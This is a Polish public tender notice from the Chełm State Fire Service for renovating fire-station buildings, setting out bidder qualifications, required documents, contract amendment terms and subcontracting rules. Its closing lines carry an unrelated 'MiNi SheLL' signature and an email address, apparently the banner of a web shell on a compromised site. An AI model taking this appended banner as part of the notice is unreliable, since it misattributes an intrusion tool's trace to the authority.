Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 200.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 300.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 300.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Oświadczenie o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do<br/> wykluczenia, zgodnie ze wzorem treści przedstawionym w załączniku nr 4 do SIWZ. <br/>2. W przypadku, gdy o zamówienie ubiegają się wykonawcy występujący wspólnie, <br/> ww. oświadczenia składa każdy z wykonawców we własnym imieniu. Oświadczenie<br/> potwierdza spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy <br/> z wykonawców wykazuje spełnienie tych warunków. Oświadczenie potwierdza również<br/> brak podstaw do wykluczenia.<br/>3. W przypadku gdy Wykonawca powołuje się na zasoby innych podmiotów, w celu <br/> wykazania spełnienia warunków udziału w postępowaniu w zakresie, w którym <br/> Wykonawca powołuje się na ich zasoby, przedstawia zobowiązanie tych podmiotów do <br/> oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. <br/> Zamawiający nie żąda, aby Wykonawca, który zamierza powierzyć wykonanie części <br/> zamówienia podwykonawcom, składał w stosunku do nich oświadczenie, że ww.podmioty <br/> nie podlegają wykluczeniu z postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza w terminie 3 dni od <br/> dnia zamieszczenia na stronie internetowej informacji o której mowa w art. 253 ust. 2 <br/> ustawy p.z.p., przekaże Zamawiającemu oświadczenie o przynależności lub braku <br/> przynależności do tej samej grupy kapitałowej , o której mowa w art.85 ust. 1 <br/> ustawy p.z.p. (załącznik Nr 5). Wraz ze złożeniem oświadczenia<br/> Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą<br/> do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (art. 85 ust 2 ustawy<br/> pzp). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Aktualny na dzień złożenia wykaz robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich rodzaju, wartości daty miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie.<br/>2. Aktualny na dzień złożenia wykaz osób, skierowanych przez Wykonawcę do realizacji<br/> zamówienia publicznego odpowiedzialnych za kierowanie robotami budowlanymi wraz<br/> z informacją na temat kwalifikacji zawodowych, uprawnień oraz podstawie do<br/> dysponowania tymi osobami (złącznik Nr 8).<br/>3. Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/> wysokość posiadanych środków finansowych lub zdolności kredytowej Wykonawcy<br/> w wysokości nie niższej niż 300 000, 00 zł. wystawionej nie wcześniej niż 1 miesiąc przed<br/> upływem terminu składania ofert.<br/>4. Aktualny dokument potwierdzający posiadanie przez Wykonawcę ubezpieczenia <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 300 000,00 zł. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do<br/> wykluczenia, zgodnie ze wzorem treści przedstawionym w załączniku nr 4 do SIWZ. <br/>2. W przypadku, gdy o zamówienie ubiegają się wykonawcy występujący wspólnie, <br/> ww. oświadczenia składa każdy z wykonawców we własnym imieniu. Oświadczenie<br/> potwierdza spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy <br/> z wykonawców wykazuje spełnienie tych warunków. Oświadczenie potwierdza również<br/> brak podstaw do wykluczenia.<br/>3. W przypadku gdy Wykonawca powołuje się na zasoby innych podmiotów, w celu <br/> wykazania spełnienia warunków udziału w postępowaniu w zakresie, w którym <br/> Wykonawca powołuje się na ich zasoby, przedstawia zobowiązanie tych podmiotów do <br/> oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. <br/> Zamawiający nie żąda, aby Wykonawca, który zamierza powierzyć wykonanie części <br/> zamówienia podwykonawcom, składał w stosunku do nich oświadczenie, że ww.podmioty <br/> nie podlegają wykluczeniu z postępowania.<br/>4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza w terminie 3 dni od <br/> dnia zamieszczenia na stronie internetowej informacji o której mowa w art. 253 ust. 2 <br/> ustawy p.z.p., przekaże Zamawiającemu oświadczenie o przynależności lub braku <br/> przynależności do tej samej grupy kapitałowej , o której mowa w art.85 ust. 1 <br/> ustawy p.z.p. (załącznik Nr 5). Wraz ze złożeniem oświadczenia<br/> Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą<br/> do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (art. 85 ust 2 ustawy<br/> pzp). <br/>5. Zamawiający przekaże wykonawcom oraz zamieści na platformie zakupowej wzór<br/> stosownego oświadczenia. <br/>6. W sytuacji gdy Wykonawcy wspólnie ubiegają się o zamówienie ww. oświadczenie składa<br/> każdy z Wykonawców we własnym imieniu. W przypadku gdy ofertę złoży jeden<br/> Wykonawca, - będzie on obligatoryjnie zwolniony z obowiązku złożenia przedmiotowego<br/> oświadczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4.	Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy terminu realizacji umowy. Termin realizacji umowy ulegnie przesunięciu w wypadku wystąpienia opóźnień wynikających z:<br/>a) przestojów i opóźnień zawinionych przez Zamawiającego,<br/>b) działania siły wyższej (np. klęski żywiołowej, strajku, pandemii) mającej <br/> bezpośredni wpływ na terminowość wykonywanych robót,<br/>d) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>e) wydłużenia czasu oczekiwania na uzyskanie pozwoleń lub decyzji administracyjnych i uzgodnień wymaganych dla wykonania umowy, jeżeli łączny czas oczekiwania na pozwolenia i decyzje administracyjne przekroczy łącznie 21 dni.<br/><br/>W przedstawionych powyżej przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. <br/>5.	Zgodnie z treścią art. 455 ustawy prawo zamówień publicznych dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy wykonania innych czynnosci nie mających charakteru prac opisanych w pierwotnym obmiarze i kosztrysie ofertowym. Warunkiem dokonania takiej zmiany jest wystąpienie konieczności wykonania prac adaptacyjnych, które zwiększają walory funkcjonalne, sanitarne, higieniczne, techniczne lub estetyczne obiektów. Ponadto zmiana wykonawcy prac ekonomicznie nie byłaby uzasadniona i powodowałaby niedogodność lub zwiększenie kosztów dla Zamawiającego. Wartość zmiany nie może przekroczyć 10 % wartosci zamówienia określonej w kosztorysie ofertowym Wykonawcy. Informacja o konieczności wykonania ww. robót potwierdzona być musi w protokole robót dodatkowych, zatwierdzonym pisemnie przez, Zamawiającego. <br/>6.	W związku z zaistnieniem okoliczności wymienionych w pkt. 5 określona w niniejszej umowie cena, może zostać zmniejszona lub podwyższona. W przypadku podwyższenia ceny umowy jej wysokość każdorazowo powinna być ustalona z Zamawiającym jednak nie może przekraczać 10 % wartości pierwotnej umowy.<br/>7. Wykonawca nie może żądać podwyższenia wynagrodzenia, jeżeli wykonał prace o których mowa w pkt. 5 bez uzyskania pisemnej zgody Zamawiającego.<br/>8.	Zamawiający przewiduje możliwość zmiany umowy w zakresie kluczowej obsady osobowej ekipy remotowej podczas realizacji przedmiotowego zamówienia jeżeli nowo wyznaczona osoba posiadać będzie kwalifikacje odpowiadające wymaganiom określonym przez Zamawiającego w specyfikacji warunków zamówienia oraz zaistniałe zmiany będą wywołane okolicznościami, których nie można było przewidzieć w chwili podpisania umowy .<br/>9.	Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy) pod rygorem ich nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę należy złożyć w do dnia 07.09.2023 r. do godz. 1000 na platformie zakupowej Komendy Miejskiej Państwowej Straży Pożarnej, 22-100 Chełm, ul. Prymasa Stefana Wyszyńskiego 2 B. pod niżej podanym adresem: https://przetargi.lubelskie.straz.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-07 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca może powierzyć wykonanie zamówienia podwykonawcy lub podwykonawcom.<br/>2.	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której lub których wykonanie zamierza powierzyć podwykonawcy lub podwykonawcom. W umowie zostanie określony zakres robót, które wykonawca będzie wykonywał własnymi siłami lub za pomocą podwykonawców.<br/>3.	Dopuszcza się zmianę lub rezygnację z podwykonawcy. Jeżeli zmiana taka dotyczy podmiotu, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 114 ust. 2b ustawy. W celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 4 ustawy pzp, wykonawca jest zobowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stosunku nie mniejszym niż wymagany w trakcie postępowania o udzielenie niniejszego zamówienia.<br/>4.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia, zamierzający zawrzeć umowę o podwykonawstwo, której przedmiotem są usługi remontowe, lub dokonać jej zmiany (aneksowania) jest obowiązany, w trakcie realizacji zamówienia publicznego na prace remontowe, do przedłożenia zamawiającemu projektu tej umowy lub jej zmiany (aneksu), przy czym podwykonawca lub dalszy podwykonawca jest obowiązany każdorazowo dołączyć zgodę wykonawcy na zawarcie umowy o podwykonawstwo lub dokonanie jej zmiany o treści zgodnej z projektem umowy lub aneksem do umowy.<br/>5.	Termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy lub usługi.<br/>6.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na usługi remontowe jest zobowiązany do przedłożenia zamawiającemu poświadczonej za zgodność z oryginałem kopii zawartej umowy o podwykonawstwo, której przedmiotem są usługi remontowe oraz wszystkich zmian tej umowy (aneksów) w terminie 7 dni od dnia zawarcia.<br/>7.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na usługi remontowe jest zobowiązany do przedłożenia zamawiającemu poświadczonej za zgodność z oryginałem kopii zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi oraz wszystkich zmian tej umowy (aneksów) w terminie 7 dni od dnia jej zawarcia, z wyłączeniem umów o podwykonawstwo o wartości mniejszej niż 2 % wartości umowy w sprawie zamówienia publicznego.

Creat By MiNi SheLL
Email: jattceo@gmail.com